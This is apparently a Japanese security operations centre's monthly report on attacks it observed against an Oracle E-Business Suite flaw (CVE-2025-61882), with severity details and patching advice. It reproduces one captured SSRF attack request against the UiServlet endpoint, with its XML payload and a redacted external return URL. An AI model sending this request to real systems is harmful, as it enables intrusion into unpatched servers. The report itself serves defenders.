2025.11.14

2025年10月度 MBSD-SOCの検知傾向トピックス

監視

Oracle E-Business SuiteにおけるOracle Concurrent Processingの脆弱性（CVE-2025-61882）を狙った攻撃

　今月は、Oracle E-Business Suite（EBS）におけるOracle Concurrent Processingの脆弱性（CVE-2025-61882）を狙った攻撃を新たに観測しました。本脆弱性は、Oracle社から10/4(土)に公開されたもので、攻撃者に悪用された場合、認証無しでリモートからコード実行されてしまう恐れがあります。

　本脆弱性のCVSS v3.1値（脆弱性の深刻度）は、9.8（Critical）と評価されています。既にPoC（概念実証コード）が公開されており悪用事例も報告されているため、影響対象の製品を使用されている場合は、早急に最新の修正パッチを適用することをお勧めします。

　下図は、本脆弱性を狙った攻撃の検知数推移です。弊社SOCでは、10/7(火)の初検知以降、断続的に攻撃を多数観測しています。

図. CVE-2025-61882の脆弱性を狙った攻撃数推移（2025年10月）

　以下は、弊社SOCで検知した攻撃例です。SSRF（サーバサイド・リクエストフォージェリ）攻撃により、任意の外部サイトとの通信を試みています。

図. CVE-2025-61882の脆弱性を狙った攻撃例
POST /OA_HTML/configurator/UiServlet HTTP/1.1 Host: www.example.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Connection: close Content-Length: 374 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip redirectFromJsp=1&getUiType=<?xml version=""1.0"" encoding=""UTF-8""?> <initialize> <param name=""init_was_saved"">test</param> <param name=""return_url"">http://外部URL</param> <param name=""ui_def_id"">0</param> <param name=""config_effective_usage_id"">0</param> <param name=""ui_type"">Applet</param> </initialize>